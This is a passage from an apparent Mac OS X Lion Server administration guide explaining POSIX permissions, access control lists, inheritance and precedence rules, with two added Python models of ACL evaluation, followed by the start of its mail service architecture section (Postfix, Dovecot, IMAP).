Standard POSIX permissions let you control access to files and folders based on three categories of users: Owner, Group, and Others. Although these permissions give you some control over who can access a file or a folder, they lack the flexibility and granularity that many organizations require in dealing with complex user environments. This is where ACLs come in handy. An ACL provides an extended set of permissions for a file or folder, and lets you set multiple users and groups as owners. ACLs are also compatible with Windows Server 2003, Windows XP, Windows Vista, and Windows 7, giving you added flexibility in a multiplatform environment.


Standard permissions
There are four types of standard POSIX access permissions that you can assign to a share point, folder, or file: Read & Write, Read Only, Write Only, and None. The following table shows how these permissions affect user access to shared items (files, folders, and share points).

Users can                                        Read & Write   Read Only   Write Only   None
Open a shared file                               Yes            Yes         No           No
Copy a shared file                               Yes            Yes         No           No
Edit a shared file                               Yes            No          No           No
Move items to a shared folder or share point     Yes            No          Yes          No
Move items from a shared folder or share point   Yes            No          No           No

Note: WebDAV has separate permissions settings.

Explicit permissions
Share points and the shared items they contain (including folders and files) have separate permissions. If you move an item to a different folder, it keeps its permissions and doesn't adopt the permissions of the folder where you moved it. In the following illustration, the second folder (Designs) and the third folder (Documents) were assigned permissions different from those of their parent folders:

The user categories Owner, Group, and Others
You can assign standard POSIX access permissions separately to three categories of users:
Owner: A user who creates an item (file or folder) on the file server is its owner and automatically has Read & Write permissions for that folder. By default, the owner of an item and the server administrator are the only users who can change its access privileges (but you can enable a group or others to use the item). The administrator can also transfer ownership of the shared item to another user. Note: When you copy an item to a drop box on a Mac file server, ownership of the item doesn't change. Only the owner of the drop box or root has access to its contents.
Group: You can put users who need the same access to files and folders in group accounts. Only one group can be assigned access permissions to a shared item. For more information about creating groups, search Help for Users & Groups.
Others: Others is any user (registered user or guest) who can log in to the file server.

Hierarchy of permissions
If a user is included in more than one category of users, each of which has different permissions, these rules apply:
Group permissions override Others permissions.
Owner permissions override Group permissions. For example, when a user is the owner of a shared item and a member of the group assigned to it, the user has the permissions assigned to the owner.
The more restrictive permissions always take precedence. For example, if a user belongs to a group that has No Access assigned to an item while the Others permissions are set to Read & Write access, the item's No Access privilege overrides the Others setting, denying the user access to the item.

Client users and permissions
Users of AppleShare Client software can set access privileges for files and folders they own. Users who use Windows file sharing services can also set access privileges.

Standard permission propagation
The Server app lets you specify which standard permissions to propagate. For example, you can propagate only the permission for Others to all descendants of a folder and leave the permissions for Owner and Group unchanged. For more information, see Propagate access permissions.


Access control lists (ACLs)


When standard POSIX permissions aren't enough, use access control lists (ACLs). An ACL is a list of access control entries (ACEs), each specifying the permissions to be granted or denied to a group or user and how these permissions are propagated throughout a folder hierarchy. ACLs in Mac OS X Lion let you set file and folder access permissions for multiple users and groups in addition to standard POSIX permissions. This makes it easy to set up collaborative environments with smooth file sharing and uninterrupted workflows, without compromising security. ACLs provide an extended set of permissions for a file or folder, to give you more granularity when assigning privileges than standard permissions would provide. For example, rather than giving a user full write permissions, you can restrict him or her to create only folders and not files. Only the Mac OS Extended volume format provides local file system support for ACLs. In addition, only the SMB and AFP protocols provide network file system support for ACLs in Windows and Apple networks, respectively. Apple's ACL model supports 13 permissions for controlling access to files and folders, as described in the following table (permission name, type, and description):

Change Permissions (Administration): User can change standard permissions.
Take Ownership (Administration): User can change the file's or folder's ownership to himself or herself.
Read Attributes (Read): User can view the file's or folder's attributes (for example, name, date, and size).
Read Extended Attributes (Read): User can view the file's or folder's attributes added by third-party developers.
List Folder Contents (Read Data) (Read): User can list folder contents and read files.
Traverse Folder (Execute File) (Read): User can open subfolders and run a program.
Read Permissions (Read): User can view the file's or folder's standard permissions using the Get Info or Terminal commands.
Write Attributes (Write): User can change the file's or folder's standard attributes.
Write Extended Attributes (Write): User can change the file's or folder's other attributes.
Create Files (Write Data) (Write): User can create files and change files.
Create Folder (Append Data) (Write): User can create subfolders and add data to files.
Delete (Write): User can delete a file or folder.
Delete Subfolders and Files (Write): User can delete subfolders and files.

In addition to these permissions, the Apple ACL model defines four types of inheritance that specify how these permissions are propagated:
Apply to this folder: Apply (Administration, Read, and Write) permissions to this folder.
Apply to child folders: Apply permissions to subfolders.
Apply to child files: Apply permissions to the files in this folder.
Apply to all descendants: Apply permissions to descendants. To learn how this option works with the previous two, see Access control entries (ACEs).

The ACL use model
The ACL use model focuses on access control at the folder level, with most ACLs applied to files as the result of inheritance. Folder-level control determines which users have access to the contents of a folder. Inheritance determines how a defined set of permissions and rules pass from the container to the objects in it. Without this model, administration of access control would quickly become a nightmare, because you would need to create and manage ACLs on thousands or millions of files. Controlling access to files through inheritance also frees applications from maintaining extended attributes or explicit ACEs when saving a file, because the system applies inherited ACEs to files. For information about explicit ACEs, see Access control entries (ACEs).

ACLs and standard permissions
You can set ACL permissions for files and folders in addition to standard permissions. For more information about how Mac OS X Lion uses ACL and standard permissions to determine what users can and cannot do to a file or folder, see Access control entries (ACEs).

ACL management
In Mac OS X Lion, you create and manage ACLs in the Server app. The Get Info window in the Finder displays the logged-in user's effective permissions. For information about setting up and managing ACLs, see Set folder access permissions and Control access to a shared folder.
In addition to using the Server app to set and view ACL permissions, you can also use the ls and chmod command-line tools. For information, see their man pages. You define ACLs for share points, files, and folders using the Server app.

User collaboration services

File Sharing

File permissions

About permissions

Access control entries (ACEs)


An ACE is an entry in an ACL that specifies, for a group or a user, access permissions to a file or folder and the rules of inheritance.

What's stored in an ACE
An ACE contains the following fields:

User or Group. An ACE stores a universally unique ID for a group or user, which permits unambiguous resolution of identity.
Type. An ACE supports two permission types, Allow and Deny, which determine whether permissions are granted or denied. In the Server app, you can only set the Allow permission type. You can use the ls and chmod command-line tools to set the Deny permission type. For information, see their man pages.
Permission. This field stores the settings for the 13 permissions supported by the Apple ACL model.

Inherited. This field specifies whether the ACE is inherited from the parent folder.
Applies To. This field specifies what the ACE permission is for.

Explicit and inherited ACEs
The Server app supports two types of ACEs:

Explicit ACEs, which are those you create in an ACL. See Set folder access permissions.
Inherited ACEs, which are ACEs you created for a parent folder that were inherited by a descendant file or folder.

Note: Inherited ACEs cannot be edited unless you make them explicit.

Understanding inheritance
ACL inheritance lets you specify how permissions pass from a folder to its descendants.

The Apple ACL inheritance model
The Apple ACL inheritance model defines four options that you select or deselect in the Server app to control the application of ACEs (in other words, how to propagate permissions through a folder hierarchy):

Inheritance option | Description
Apply to this folder | Apply (Administration, Read, and Write) permissions to this folder
Apply to child folders | Apply permissions to subfolders
Apply to child files | Apply permissions to the files in this folder
Apply to all descendants | Apply permissions to all descendants. Note: If you want an ACE to apply to all descendants without exception, you must select the Apply to child folders and Apply to child files options in addition to this option.

Mac OS X Lion propagates ACL permissions at two well-defined times:

At file or folder creation time: when you create a file or folder, the kernel determines what permissions the file or folder inherits from its parent folder.
When initiated by administrator tools: for example, when you use the Propagate Permissions option in the Server app.

The following figure shows how the Server app propagates two ACEs (managers and design_team) after ACE creation. Bold text represents an explicit ACE and regular text represents an inherited ACE.

ACL inheritance combinations
When you set inheritance options for an ACE in the Server app, you can choose from 12 unique inheritance combinations for propagating ACL permissions. [Table: the 12 combinations, each a selection among Apply to this folder, Apply to child folders, Apply to child files, and Apply to all descendants; the per-row selections are not reproduced here.]
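The following is an added example, not code from Apple or from this manual, that models how an ACE's four inheritance options propagate to new items and what Propagate Permissions and Remove Inherited Entries do to a folder tree. The tree, the ACEs and the group names (design_team, managers, auditors, anne) are constructed for the example; the flag handling follows the chmod(1) ACL flags the four options correspond to (only_inherit, directory_inherit, file_inherit, limit_inherit). Bundles and root-owned items, which real propagation leaves alone, are not modelled.

```python
"""Model of ACE inheritance under the four Server app options, at creation
time and when Propagate Permissions is run.  Added illustration, not Apple's
code: tree, ACEs and names are constructed for the example."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Inherit:
    this_folder: bool = True      # unchecked == only_inherit
    child_folders: bool = True    # directory_inherit
    child_files: bool = True      # file_inherit
    all_descendants: bool = True  # unchecked == limit_inherit


@dataclass
class ACE:
    who: str
    perms: str                # label only; access evaluation is not modelled here
    flags: Inherit = Inherit()
    inherited: bool = False


@dataclass
class Node:
    name: str
    is_dir: bool
    acl: list = field(default_factory=list)
    children: list = field(default_factory=list)


def inherited_copy(ace, child_is_dir):
    """The ACE a new child receives from one of its parent's ACEs, or None."""
    f = ace.flags
    if child_is_dir and not f.child_folders:
        return None
    if not child_is_dir and not f.child_files:
        return None
    if child_is_dir and f.all_descendants:
        flags = Inherit(True, f.child_folders, f.child_files, True)
    else:
        # Files never propagate further; limit_inherit stops after direct children.
        flags = Inherit(True, False, False, True)
    return ACE(ace.who, ace.perms, flags, inherited=True)


def create(parent, name, is_dir):
    """Creation-time inheritance, as the kernel performs it."""
    node = Node(name, is_dir)
    node.acl = [c for c in (inherited_copy(a, is_dir) for a in parent.acl) if c]
    parent.children.append(node)
    return node


def effective(node):
    """ACEs that govern access to the node itself (Apply to this folder set)."""
    return [a.who for a in node.acl if a.flags.this_folder]


def propagate_acl(folder):
    """Propagate Permissions with only the Access Control List option selected:
    each descendant's inherited ACEs are rebuilt from its parent; explicit ACEs stay."""
    for child in folder.children:
        explicit = [a for a in child.acl if not a.inherited]
        child.acl = explicit + [c for c in (inherited_copy(a, child.is_dir) for a in folder.acl) if c]
        if child.is_dir:
            propagate_acl(child)


def remove_inherited(node):
    """Remove Inherited Entries on a single item."""
    node.acl = [a for a in node.acl if not a.inherited]


def names(node):
    return [a.who for a in node.acl]


def demo():
    projects = Node("Projects", True, acl=[
        ACE("design_team", "read/write"),                                  # all four options
        ACE("managers", "full control", Inherit(all_descendants=False)),  # direct children only
        ACE("auditors", "read", Inherit(this_folder=False)),              # descendants only
    ])
    q3 = create(projects, "Q3", True)
    plan = create(q3, "plan.txt", False)
    archive = create(q3, "archive", True)
    old = create(archive, "old.txt", False)
    out = {"root_effective": effective(projects), "q3": names(q3),
           "plan_txt": names(plan), "archive": names(archive), "old_txt": names(old)}
    # Exception subtree: strip archive's inherited entries, then propagate from it
    # so its own descendants lose them too.
    remove_inherited(archive)
    propagate_acl(archive)
    out["old_txt_after_exception"] = names(old)
    # Caveat: propagating again from the root re-applies inheritance and silently
    # undoes the exception; an explicit ACE on Q3 survives and is inherited below it.
    q3.acl.insert(0, ACE("anne", "read"))
    propagate_acl(projects)
    out["archive_after_root_propagate"] = names(archive)
    return out
```

Running demo() shows the managers ACE reaching Q3 but not Q3/archive or any file, the auditors ACE applying to everything except the share point itself, and the exception subtree being overwritten by a later propagation from the root, which is the operational reason to keep a record of such exceptions.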

ACL permission propagation
The Server app lets you force the propagation of ACLs. Although the Server app does this automatically, there are cases when you might want to manually propagate permissions:

You can propagate permissions to handle exceptions. For example, you might want ACLs to apply to all descendants except for a subtree of your folder hierarchy. In this case, you define ACEs for the root folder and set them to propagate to descendants. Then, you select the root folder of the subtree and propagate permissions to remove the ACLs from descendants of that subtree. In the following example, the items in white had their ACLs removed by manually propagating ACLs.

You can propagate permissions to reapply inheritance in cases where you removed a folder's ACLs and decided to reapply them.
You can propagate permissions to clear all ACLs at once instead of going through a folder hierarchy and manually removing ACEs.

When you propagate permissions, the permissions of bundles and root-owned files and folders aren't changed. For more information about how to manually propagate permissions, see Propagate access permissions.

Rules of precedence
Mac OS X Lion uses the following rules to control access to files and folders:

Without ACEs, POSIX permissions apply. If a file or folder has no ACEs defined for it, Mac OS X Lion applies standard POSIX permissions.
With ACEs, order is important. If a file or folder has ACEs defined for it, Mac OS X Lion starts with the first ACE in the ACL and works its way down the list until the requested permission is satisfied or denied. You can change the ACE order from the command line using the chmod command.
Allow permissions are cumulative. When evaluating Allow permissions for a user in an ACL, Mac OS X Lion defines the user's permissions as the union of all permissions assigned to the user, including standard POSIX permissions.

After evaluating ACEs, Mac OS X Lion evaluates the standard POSIX permissions defined for the file or folder. Then, based on the evaluation of ACL and standard POSIX permissions, Mac OS X Lion determines the type of access a user has to a shared file or folder.
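The rules of precedence above, and the ACE ordering rule restated under Set ACL permissions, are worked through in the following added example. It is not Apple's kernel code: the share point, the identities, the POSIX mode and the group names are constructed, and the mapping of ACL permissions onto rwx bits is a simplification that treats the node as a folder.

```python
"""Model of Lion's rules of precedence for an item that carries an ACL.
Added illustration, not Apple's code: ACEs, identities and mode bits are
constructed for the example and the POSIX mapping is simplified."""
from dataclasses import dataclass, field

# Permission names follow the chmod(1) ACL syntax on Mac OS X.
READ_PERMS = {"read", "list", "readattr", "readextattr", "readsecurity"}
EXEC_PERMS = {"search", "execute"}
WRITE_PERMS = {"write", "append", "add_file", "add_subdirectory", "delete",
               "delete_child", "writeattr", "writeextattr"}
ADMIN_PERMS = {"writesecurity", "chown"}


@dataclass
class ACE:
    who: str            # user or group name (a real ACE stores a UUID)
    kind: str           # "allow" or "deny"
    perms: frozenset    # subset of the permission names above


@dataclass
class Identity:
    user: str
    groups: frozenset


@dataclass
class Node:
    """A folder: an ordered ACL plus its POSIX owner, group and mode bits."""
    acl: list = field(default_factory=list)
    owner: str = "root"
    group: str = "wheel"
    mode: int = 0o755


def _matches(ace, ident):
    return ace.who == ident.user or ace.who in ident.groups


def _posix_allows(node, ident, perm):
    """Fallback: the rwx class POSIX would consult for this permission."""
    if perm in ADMIN_PERMS:
        return ident.user == node.owner      # only the owner may chmod/chown
    bit = 4 if perm in READ_PERMS else 1 if perm in EXEC_PERMS else 2
    if ident.user == node.owner:
        shift = 6
    elif node.group in ident.groups:
        shift = 3
    else:
        shift = 0
    return bool((node.mode >> shift) & bit)


def check_access(node, ident, wanted):
    """Walk the ACL in order.  A matching Deny covering any permission not yet
    granted stops evaluation; matching Allows accumulate (the union rule);
    whatever is still unsatisfied falls through to the POSIX bits."""
    remaining = set(wanted)
    for index, ace in enumerate(node.acl):
        if not remaining:
            break
        if not _matches(ace, ident):
            continue
        hit = remaining & ace.perms
        if not hit:
            continue
        if ace.kind == "deny":
            return False, f"denied by ACE {index} ({ace.who}): {sorted(hit)}"
        remaining -= hit
    if not remaining:
        return True, "granted by ACL"
    for perm in sorted(remaining):
        if not _posix_allows(node, ident, perm):
            return False, f"{perm} not granted by ACL or POSIX mode {oct(node.mode)}"
    return True, "granted by ACL plus POSIX"


def demo():
    """Constructed share point: admins own it, design_team may read and add
    items, and a Deny ACE for one team member sits first (canonical order)."""
    team_allow = ACE("design_team", "allow",
                     frozenset({"list", "search", "read", "add_file", "add_subdirectory"}))
    anne_deny = ACE("anne", "deny", frozenset({"list", "read"}))
    share = Node(owner="root", group="admin", mode=0o750, acl=[anne_deny, team_allow])
    anne = Identity("anne", frozenset({"design_team", "staff"}))
    bob = Identity("bob", frozenset({"design_team", "staff"}))
    carol = Identity("carol", frozenset({"staff"}))
    results = {
        "anne_list": check_access(share, anne, {"list"})[0],              # Deny first
        "bob_add_file": check_access(share, bob, {"add_file"})[0],        # Allow ACE
        "bob_delete_child": check_access(share, bob, {"delete_child"})[0],  # no ACE, POSIX others
        "carol_list": check_access(share, carol, {"list"})[0],            # no ACE, POSIX others
    }
    # Same two ACEs with Allow first: Anne's request is satisfied before the Deny
    # is reached, which is why canonical sorting puts Deny entries first.
    reordered = Node(owner="root", group="admin", mode=0o750, acl=[team_allow, anne_deny])
    results["anne_list_allow_first"] = check_access(reordered, anne, {"list"})[0]
    return results
```

The reordered case is the one to remember when editing ACLs from the command line: a Deny ACE that is appended after an Allow covering the same right is dead for that right, so sort the list canonically (or check it with ls -le) after changing ACE order with chmod.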


Permissions in practice
Mac OS X Lion combines traditional POSIX permissions with ACLs. This combination provides great flexibility and fine granularity in controlling access to files and folders. However, if you're not careful in how you assign privileges, it may be hard for you to keep track of how permissions are assigned. With 17 permissions, you can choose from a staggering 98,304 combinations. Add to that a sophisticated folder hierarchy, many users and groups, and many exceptions, and you have a recipe for considerable confusion. The following are useful tips and advice to help you get the most out of access control in Mac OS X Lion.

Manage permissions at the group level
Assign permissions to groups first, and assign permissions to individual users only when there is an exception. For example, you can assign all teachers in a school district Read and Write permissions to a specific share point, but deny Anne Johnson, a temporary teacher, permission to read a specific folder in the share point's folder hierarchy. Using groups is the most efficient way of assigning permissions. After creating groups and assigning them permissions, you can add or remove users without reassigning permissions.

Gradually add permissions
Assign only necessary permissions and then add permissions only when needed. As long as you use Allow permissions, Mac OS X Lion combines the permissions. For example, you can assign the Students group partial reading permissions on an entire share point. Then, where needed in the folder hierarchy, you can give the group more read and write permissions.

Use the Deny rule only when necessary
When Mac OS X Lion encounters a Deny permission, it stops evaluating other permissions the user might have for a file or folder and applies the Deny permission. Therefore, use Deny permissions only when absolutely necessary. Keep a record of these Deny permissions so you can delete them when they aren't needed.

Always propagate permissions
Inheritance is a powerful feature, so take advantage of it. By propagating permissions down a folder hierarchy, you save yourself the time and effort required to manually assign permissions to descendants.

Protect applications from being modified
If you share applications, make sure you set their permissions so that no one except a trusted few can change them. A writable shared application is a vulnerability that attackers can exploit to introduce viruses or Trojan horses into your environment.

Keep it simple
You can complicate file access management unnecessarily if you're not careful. Keep it simple. If standard POSIX permissions do the job, use those, but if you must use ACLs, avoid customizing permissions if you don't need to. Use simple folder hierarchies if feasible. A little strategic planning can help you create effective and manageable shared hierarchies.


Security considerations
The most effective method of securing your network is to assign correct privileges for each file, folder, and share point you create.

Restricting access to file services
You can use the Server app to restrict which users or groups have access to files, folders, and share points.

Restricting access to Everyone
Be careful when creating and granting access to share points, especially if you're connected to the Internet. Granting access to Everyone could expose your data to anyone on the Internet.

Restricting guest access
When you configure any file service, you can turn on guest access. Guests are users who connect to the server anonymously without entering a user name or password. Users who connect anonymously are restricted to files and folders that have privileges set to Everyone. To protect your information from unauthorized access, and to prevent people from introducing software that might damage your information or equipment, take the following precautions using File Sharing in the Server app. Depending on the controls you want to place on guest access to a share point, consider the following options:

Set privileges for Everyone to None for files and folders that guests shouldn't access. Items with this privilege setting can be accessed only by the item's owner or group.
Put all files available to guests in one folder or set of folders and then assign the Read Only privilege to the Everyone category for that folder and each file in it.
Assign Read & Write privileges to the Everyone category for a folder only if guests must be able to change or add items in the folder. Make sure you keep a backup copy of the information in this folder.
Disable access for guests or anonymous users over AFP and SMB.
Share individual folders instead of entire volumes. The folders should contain only those items you want to share.

User collaboration services

File Sharing

File permissions

Manage permissions

Set folder access permissions


You can set file and folder access permissions with the Server app. Mac OS X Lion provides two ways to control access to files and folders: standard permissions and ACL permissions. Standard permissions provide basic control. ACL permissions provide more flexibility and control, but are more complex.

Set standard permissions
You can use the Server app to set standard permissions (Read & Write, Read Only, Write Only, or None) to control access to a folder and its contents. You can set different permissions for one user (the owner), one group, and all other users who log in. You can also set standard permissions on individual files. Standard permissions are also called POSIX permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. To grant access to a different user, double-click the current user name and enter a different user account name. As you type, the Server app looks up matching user accounts and displays them in a list. Clicking a listed user grants access permissions to that user.
4. To grant access to a different group, double-click the current group name and type the name of the new group. As you type, the Server app looks up matching group accounts and displays them in a list. Clicking a listed group grants access permissions to it.
5. To change the permission level for the user, group, or others, click the current setting in the Permission column and choose a setting from the pop-up menu. The permission level you set for Others applies to any user who logs in but isn't the specified user or a member of the specified group.

Set ACL permissions
You can use the Server app to set ACL permissions for a folder or a file. An ACL consists of Access Control Entries (ACEs), which you can add and change. Each entry applies to a specific user or group. For each entry, you can set 13 permissions, giving you much finer control over access than you have with standard permissions. For example, entries in an ACL can grant delete permission separately from write permission, so a user can edit a file but can't delete it.

The first entry in the list takes precedence over the second, which takes precedence over the third, and so on. For example, if the first entry denies a user the right to edit a file, other entries that allow the same user editing permissions are ignored. The entries in the ACL also take precedence over standard permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, then choose Edit Permissions from the Action pop-up menu.
3. To add an entry, click the Add button (+) and enter the name of the user or group you want to set specific access permissions for. As you type, the Server app looks up matching user and group accounts and displays them in a list. Clicking a user or group grants access permissions to the user or group.
4. To change the permission level for an entry, click the current setting in the Permission column and choose a setting from the pop-up menu.

Choice | Description
Full Control | Has full administration, read, write, and inheritance permissions.
Read & Write | Has full read, write, and inheritance permissions.
Read | Has full read and inheritance permissions.
Write | Has full write and inheritance permissions.
Custom | Doesn't have full administration, read, write, or inheritance permissions.

By default, each new entry has full read and inheritance permissions.
5. To change detailed permission settings for an entry, click the disclosure triangle next to the entry, optionally click the additional disclosure triangles that appear, and select or deselect permission settings. For information about the detailed permission settings, see Access control lists (ACLs) and Access control entries (ACEs).

RELATED TOPIC

Remove an ACL entry


Propagate access permissions


You can use the Server app to propagate a folder's permissions to all the folders and files it contains. You can specify which standard permissions to propagate: owner name, group name, owner permissions, group permissions, and permissions for others. You can propagate a folder's complete ACL, but you can't propagate individual entries that constitute the ACL.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder whose access permissions you want to propagate, and then choose Propagate Permissions from the Action pop-up menu.
3. Select the permissions you want to propagate, and then click OK.

Important: Propagation begins as soon as you click OK, and you can't undo propagation. Before clicking OK, make sure you select the folder and permission settings you intend.

RELATED TOPICS

Remove a folder's inherited ACL entries
Remove an ACL entry


Remove an ACL entry


You can use the Server app to remove ACL permission entries you've added. Each entry defines a user's or group's access permission to a folder or file.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. To remove an entry from the permission list, select the entry and click the Delete button (–).

RELATED TOPIC

Set folder access permissions


Sort an ACL canonically


When sorting an ACL canonically, the Server app first lists all entries that deny permission, then the entries that grant permission. ACL entries that deny permission have a permission type of Deny. Entries that grant permission have a permission type of Allow. All ACL entries created with the Server app are the Allow type. Permissions of the Deny type can exist on disks used with Mac OS X v10.6 or earlier. Permissions of the Deny type can be created on Lion Server disks by using the chmod command-line tool. For information about chmod, see its man page.

1. In the Server app sidebar, select the server, and then click Storage.
2. Select the folder or file whose ACL you want to sort, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Sort Access Control List Canonically from the Action pop-up menu in the Edit Permissions dialog.

RELATED TOPIC

Set folder access permissions


Remove a folders inherited ACL entries


If you don't want inherited ACL entries to apply to a folder or file, you can remove those entries using the Server app. Unlike explicit ACL entries, inherited ACL entries appear dimmed in the Server app's dialog for editing access permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Remove Inherited Entries from the Action pop-up menu in the Edit Permissions dialog.

RELATED TOPICS

Apply ACL inheritance to folders and files
Make inherited ACL entries explicit
Set folder access permissions


Make inherited ACL entries explicit


If you want to change inherited ACL entries for a folder or file, you must make the inherited entries explicit.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Make Inherited Entries Explicit from the Action pop-up menu in the Edit Permissions dialog. You can now edit the ACL entries.
RELATED TOPICS

Remove a folder's inherited ACL entries
Set folder access permissions


Apply ACL inheritance to folders and files


If you removed all the ACL entries from a folder or file and want to restore inherited entries, you can use the Server app to propagate the parent folder's ACL. All descendants of the parent folder inherit the propagated ACL.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the parent folder of the item whose ACL inheritance you want to restore, and then choose Propagate Permissions from the Action pop-up menu.
3. Select the Access Control List option, deselect all other options, and then click OK.

Important: Propagation begins as soon as you click OK, and you can't undo propagation. Before clicking OK, make sure you select the folder and permission settings you intend.

RELATED TOPIC

Remove a folders inherited ACL entries


Common folder permissions


When sharing files and folders between computers, you can set custom permissions to grant or restrict access to those files and folders. Before you begin setting custom file and folder permissions, you might want to investigate how the file and folder are to be shared, who has access, and what type of access you want users to have. A recommended way to manage file and folder permissions is to create groups of users who share the same privileges. Depending on your network environment, you can use standard permissions (also referred to as POSIX permissions), ACLs, or both to manage file or folder access.

The following table shows examples of the standard permissions and ACL permissions necessary to configure some common folder-sharing settings.

Folder | POSIX | ACL (Everyone)
Drop box | Owner: read, write, execute. Group: read, write, execute. Other: write | Permission Type: Allow. Select the following checkboxes: Traverse Folder, Create Files, Create Folder, and all inheritance options
Backup share | Set the owner to root and set the group to admin. Owner: read, write, execute. Group: read, write, execute. Other: no permissions | Permission Type: Allow. Select the following checkboxes: List Folder Contents, Create Files, Create Folder
Home folder | Owner: read, write, execute. Group: read only. Other: read only | Permission Type: Deny. Select Delete, Apply to this folder, and Apply to all descendants

User collaboration services

Mail

Mail service architecture


Mail service in Mac OS X Lion allows network users to send and receive mail over your network or across the Internet. Mail service sends and receives mail using the following standard Internet mail protocols:

Simple Mail Transfer Protocol (SMTP)
Internet Message Access Protocol (IMAP)
Post Office Protocol (POP)

A standard mail client setup uses SMTP to send outgoing mail and POP or IMAP to receive incoming mail. Mac OS X Lion includes an SMTP service and a combined POP and IMAP service. Mail service also uses a Domain Name System (DNS) service to determine the destination IP address of outgoing mail. The following image gives an overview of how the components of Mac OS X Lion Mail service interact:


Mail transfer agent (MTA)


Mac OS X Lion uses Postfix as its mail transfer agent (MTA). Postfix fully supports SMTP. Your mail users set their mail application's outgoing mail server to your Mac OS X Lion server running Postfix.

Postfix is easy to administer. Its basic configuration can be managed through Server Admin, so you don't need to edit the configuration file directly.

Postfix uses multiple layers of defense to protect the server computer from intruders:

There is no direct path from the network to the security-sensitive local delivery tools.
Postfix does not trust the contents of its queue files or the contents of its IPC messages.
Postfix filters sender-provided information before exporting it via environment variables.
Nearly every Postfix application can run with fixed low privileges and no ability to change ID, run with root privileges, or run as any other user.

Postfix uses the configuration files main.cf and master.cf in /etc/postfix/. When Server Admin modifies Postfix settings, it overwrites the main.cf file. If you make a manual change to the Postfix configuration file, Server Admin overwrites your changes the next time you use it to modify the Mail service configuration. The spool files for Postfix are located in /Library/Server/Mail/Data/spool/ and the log file is /var/log/mail.log. For more information about Postfix, see www.postfix.org.

If you use another MTA (such as Sendmail), you can't configure Mail service with Mac OS X administration tools. To use Sendmail instead of Postfix, disable the current SMTP service through Postfix, then install and configure Sendmail. For more information about Sendmail, see www.sendmail.org.


Mail screening
After a mail delivery connection is made and the message is accepted for local delivery (relayed mail is not screened), the mail server can screen it before delivery. Mac OS X Lion uses SpamAssassin (from spamassassin.apache.org) to analyze the text of a message and give it a probability rating for being junk mail. No junk mail filter is 100% accurate in identifying unwanted mail. For this reason the junk mail filter in Mac OS X Lion doesn't delete junk mail or prevent it from being delivered. Instead, it marks the mail as potential junk mail. The user can then decide whether it's really unsolicited commercial mail and deal with it accordingly. Many mail clients use the ratings that SpamAssassin adds as a guide in classifying mail for the user. Mac OS X Lion uses ClamAV (from www.clamav.net) to scan mail messages for viruses. If a suspected virus is found, you can deal with it in several ways. The virus definitions are kept up to date (if enabled) via the Internet using a process called freshclam.
RELATED INFORMATION

Mail service filtering


Where mail is stored


Mail is stored in an outgoing queue awaiting transfer to a remote server or in a local mail store accessible by local mail users.

Outgoing mail location
By default, outgoing mail messages are stored in the spool directory on the startup disk in /Library/Server/Mail/Data/spool/. This location is temporary, and the mail is stored there until it's transferred to the Internet. These locations can be moved to any accessible volume if you create a symbolic link to the new location.

Incoming mail location
Mail service stores each message as a separate file in a mail folder for each user. Incoming mail is stored on the startup disk in /Library/Server/Mail/Data/mail/. You can change the location of mail folders and indexes to another folder, disk, or disk partition. You can even specify a shared volume on another server as the location of the mail folder, although using a shared volume negatively affects performance. For remotely mounted file systems, NFS isn't recommended. The incoming mail remains on the server until deleted by a mail user agent (MUA). Mail storage can also be split across multiple partitions or stored on an Xsan cluster. This can be done to scale Mail service or to facilitate data backup.
RELATED INFORMATION

Set up mail server clustering with Xsan


Local delivery agent (LDA)


Mail is transferred from incoming mail storage to the mail recipient's inbox by a local delivery agent (LDA). The LDA handles local delivery, making mail accessible by the user's mail application. Two protocols are available from the Mac OS X LDA: POP and IMAP. Mac OS X Lion uses Dovecot to provide POP and IMAP service. Your mail users set their mail application's incoming mail server to your Mac OS X Lion server running Dovecot. More information about Dovecot can be found at http://www.dovecot.org/.

Dovecot
Dovecot is an open-source enterprise mail system for use in small to large enterprise environments. Dovecot developers have focused on security, scalability, and ease of administration. Each message is stored as a separate file in a mail folder for each user. This design gives the server advantages in efficiency, scalability, and administration. User access to mail is primarily through software using IMAP or POP3.

Dovecot uses the configuration files /etc/dovecot/dovecot.conf and /etc/dovecot/conf.d/*. Server Admin uses the files in /etc/dovecot/default/. Dovecot logs its events in /var/log/mailaccess.log. The Dovecot mail store is located in /Library/Server/Mail/Data/mail/. The Dovecot delivery application receives mail from the Postfix delivery agent and stores the mail in user spool files in /Library/Server/Mail/Data/mail/GUID, where GUID is the Globally Unique ID (GUID) of the mail user. The user can then use IMAP or POP to retrieve messages. After receiving mail from external MTAs, you can apply virus filtering or junk mail filtering to the messages. Mac OS X Lion uses ClamAV and SpamAssassin for these tasks.

Internet Message Access Protocol (IMAP)
IMAP is the solution for people who use more than one computer to receive mail. IMAP is a client-server mail protocol that allows users to access mail from anywhere on the Internet. With IMAP, a user's mail is delivered to the server and stored in a remote mailbox on the server. To users, mail appears as if it were on the local computer. A key difference between IMAP and POP is that with IMAP the mail isn't removed from the server until the user deletes it. The IMAP user's computer can ask the server for message headers, ask for the bodies of specified messages, or search for messages that meet certain criteria. These messages are downloaded as the user opens them. IMAP connections are persistent and remain open, maintaining a load on the server and possibly the network as well.

Post Office Protocol (POP)
